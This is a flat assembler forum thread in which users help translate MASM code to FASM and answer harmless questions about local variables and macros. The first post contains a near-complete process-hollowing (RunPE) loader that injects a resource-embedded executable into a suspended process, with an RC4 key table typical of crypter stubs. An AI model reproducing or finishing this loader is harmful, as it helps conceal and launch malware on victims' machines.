flat assembler
Message board for the users of flat assembler.

Index > Main > trying to translate to fasm from masm

Author
Thread Post new topic Reply to topic
demien



Joined: 30 Aug 2011
Posts: 2
demien 30 Aug 2011, 13:26
hi. i am new in fasm and trying to translate to fasm procedure, need help!

how declare LOCAL sinfo: STARTUPINFO?
for .if eax != 0 i need to write macros?

Code:
ExtractFile:
LOCAL sinfo: STARTUPINFO
LOCAL pinfo: PROCESS_INFORMATION
LOCAL base: dword
LOCAL sec: ptr IMAGE_SECTION_HEADER
LOCAL cnt: CONTEXT
xinvoke GetModuleFileName, 0, offset mPath, 256
xinvoke GetModuleHandle, 0
mov hInstance, eax
xinvoke FindResource, hInstance, RCDATA, 1
.if eax != 0
  mov hResource, Eax
  xinvoke SizeofResource, hInstance, hResource
  .if eax != 0
    mov hResourceSize, eax
    xinvoke LoadResource, hInstance, hResource
    .if eax != 0
      xinvoke LockResource, eax
          mov ResInf , eax
            xinvoke RtlZeroMemory, addr sinfo, sizeof STARTUPINFO
               xinvoke CreateProcess, offset mPath, 0, 0, 0, 0, CREATE_SUSPENDED, 0, 0, addr sinfo, addr pinfo
             xinvoke RtlZeroMemory, addr cnt, sizeof CONTEXT
             mov cnt.ContextFlags, CONTEXT_INTEGER
               xinvoke GetThreadContext, pinfo.hThread, addr cnt
           xinvoke GetModuleHandle, 0
          mov esi,eax
         xinvoke LoadLibrary,addr nt
         xinvoke GetProcAddress,eax,addr zw
          lea ebx,pinfo.hProcess
              PUSH ESI
            PUSH [EBX]
          call eax
            ;xinvoke ZwUnmapViewOfSection, pinfo.hProcess, eax
          mov edi, ResInf 
            add edi, IMAGE_DOS_HEADER.e_lfanew[edi]
             assume edi:  ptr IMAGE_NT_HEADERS
               xinvoke VirtualAllocEx, pinfo.hProcess, [edi].OptionalHeader.ImageBase, [edi].OptionalHeader.SizeOfImage, MEM_COMMIT + MEM_RESERVE, PAGE_EXECUTE_READWRITE
          mov base, eax
               xinvoke WriteProcessMemory, pinfo.hProcess, base, ResInf , [edi].OptionalHeader.SizeOfHeaders, 0
            lea eax, [edi].OptionalHeader
               mov sec, eax
                movzx eax, [edi].FileHeader.SizeOfOptionalHeader
            add sec, eax
                xor eax, eax
                xor esi, esi
                xor ecx, ecx
                .while ( si < [edi].FileHeader.NumberOfSections )
                        imul eax, esi, sizeof IMAGE_SECTION_HEADER
                  add eax, sec
                        mov ebx, base
                       add ebx, IMAGE_SECTION_HEADER.VirtualAddress[eax]
                   mov edx, ResInf 
                    add edx, IMAGE_SECTION_HEADER.PointerToRawData[eax]
                 xinvoke WriteProcessMemory, pinfo.hProcess, ebx, edx, IMAGE_SECTION_HEADER.SizeOfRawData[eax],0 
                    inc esi
             .endw
               mov eax, base
               add eax, [edi].OptionalHeader.AddressOfEntryPoint
           mov cnt.regEax, eax
         xinvoke SetThreadContext, pinfo.hThread, addr cnt
           xinvoke ResumeThread, pinfo.hThread
         ret
    .endif
  .endif
.endif  
    

_________________
asm power!
Post 30 Aug 2011, 13:26
View user's profile Send private message Reply with quote
Overflowz



Joined: 03 Sep 2010
Posts: 1046
Overflowz 30 Aug 2011, 13:37
Loading executable from memory.. right. Use another way like how DLL's are loaded, do same with executable. (it should have .reloc section too.)
1) sinfo STARTUPINFO
2) cmp eax,0 --> jnz somewhere
---
also, xinvoke are another macro. without xinvoke, that code won't work fine.
Post 30 Aug 2011, 13:37
View user's profile Send private message Reply with quote
demien



Joined: 30 Aug 2011
Posts: 2
demien 30 Aug 2011, 13:50
thanx Overflowz
and
.data?
mPath byte 256 dup (0)
ThreadID DWORD ?
hInstance dword ?
loop_stopper dword ?
ResInf dword ?
hResourceSize dword ?
hResource dword ?
rc4keytable DB 256 dup (?)

will be ?
section '.bbs' data readable
mPath rb 256h

btw
Code:
macro xinvoke proc,[arg]                    
  {                                         
    common
      if ~ arg eq
    reverse
      pushd arg
    common
      end if
    call [ebx+_#proc-_delta]
  }

entry start    


=)

and here...
xinvoke LoadLibrary,addr nt
xinvoke GetProcAddress,eax,addr zw

i need do such: xinvoke LoadLibrary,addr [nt] ?
-----
aslo maybe someone have something like my function already in fasm?
with this code some exe files like for example Win XP SP2 calc.exe execute with error
Post 30 Aug 2011, 13:50
View user's profile Send private message Reply with quote
Overflowz



Joined: 03 Sep 2010
Posts: 1046
Overflowz 30 Aug 2011, 14:42
data? means unitialized data so, you can make it in every section which you like, it doesn't matter.
---
about macroses, I haven't learned it yet.
addr nt = just nt in fasm. xinvoke LoadLibrary,nt it's same.
---
check this out if you'll find something interesting.
http://board.flatassembler.net/topic.php?t=12644
---
also, if you'll have success, can you post working code here ? Wink I am stucking at "GetThreadContext" API.
Post 30 Aug 2011, 14:42
View user's profile Send private message Reply with quote
Enko



Joined: 03 Apr 2007
Posts: 676
Location: Mar del Plata
Enko 30 Aug 2011, 14:55
.if eax != 0

in fasm it

Code:
.if eax <> 0
   ;block
.elseif eax = 1
   ;block
.else
   ;block
.endif
    


you need to include: win32ax.inc or
win32a.inc with '\macro\if.inc''

Quote:

xinvoke LoadLibrary,addr nt
xinvoke GetProcAddress,eax,addr zw
i need do such: xinvoke LoadLibrary,addr [nt] ?

sorry, I don't know what is xinvoke in masm... why not use invoke?

for the "addr":


masm
Code:
var1 ;content
addr var1; dir of var1
offset var1; dir of var1
    

if var1 is local, in masm
Code:
addr var1
;lea eax, [ebp -X]
    



in fasm
Code:
[var1]; content 
var1; offset var1
    

if its local variable and you use standard macros
Code:
mov eax, var1; will fail, because:
;mov eax, ebp-8 
    

if you use extenden macros, there is addr macro for this cases.
Code:
;include (win32ax.inc)

invoke SomeProc, addr local1

;lea eax, [ebp - 8]
;push eax
;call [SomeProc]
    
Post 30 Aug 2011, 14:55
View user's profile Send private message Reply with quote
Newp



Joined: 13 Feb 2013
Posts: 1
Newp 13 Feb 2013, 03:42
Hello community,
i have the same problem and i dont know how to store loval variables in Fasm.

And it should look like so...

Enko wrote:

if you use extenden macros, there is addr macro for this cases.
Code:
;include (win32ax.inc)

invoke SomeProc, addr local1

;lea eax, [ebp - 8]
;push eax
;call [SomeProc]
    



A lot of things i tried, like proc virtual and locals but it will not work for me and i have no idea now.


Code:
format PE GUI 4.0
include 'D:\FASM\INCLUDE\WIN32AX.INC'

entry start 

section '.data' data readable writeable

_global   db 'Title',0
_local    db 'message',0


section '.code' code readable executable

; Entry point
start:

locals
  .var _local
endl

    invoke  MessageBox,NULL ,[.var] , _global ,MB_OK
    ret


section '.idata' import data readable

library USER32,'user32.dll'
import USER32,MessageBox,'MessageBoxA'     
Post 13 Feb 2013, 03:42
View user's profile Send private message Reply with quote
Overflowz



Joined: 03 Sep 2010
Posts: 1046
Overflowz 31 Mar 2013, 02:30
Newp
Try this:
Code:
format PE GUI 4.0 
include 'D:\FASM\INCLUDE\WIN32AX.INC' 

entry start  

section '.code' code readable executable 

; Entry point 
proc start 

locals 
  _local db "Hello, World!",0 
endl 

    invoke  MessageBox,NULL ,addr _local , NULL ,MB_OK 
    ret
 
endp

section '.idata' import data readable 

library USER32,'user32.dll' 
import USER32,MessageBox,'MessageBoxA'    
Post 31 Mar 2013, 02:30
View user's profile Send private message Reply with quote
Display posts from previous:
Post new topic Reply to topic

Jump to:  


< Last Thread | Next Thread >
Forum Rules:
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum


Copyright © 1999-2025, Tomasz Grysztar. Also on GitHub, YouTube.

Website powered by rwasa.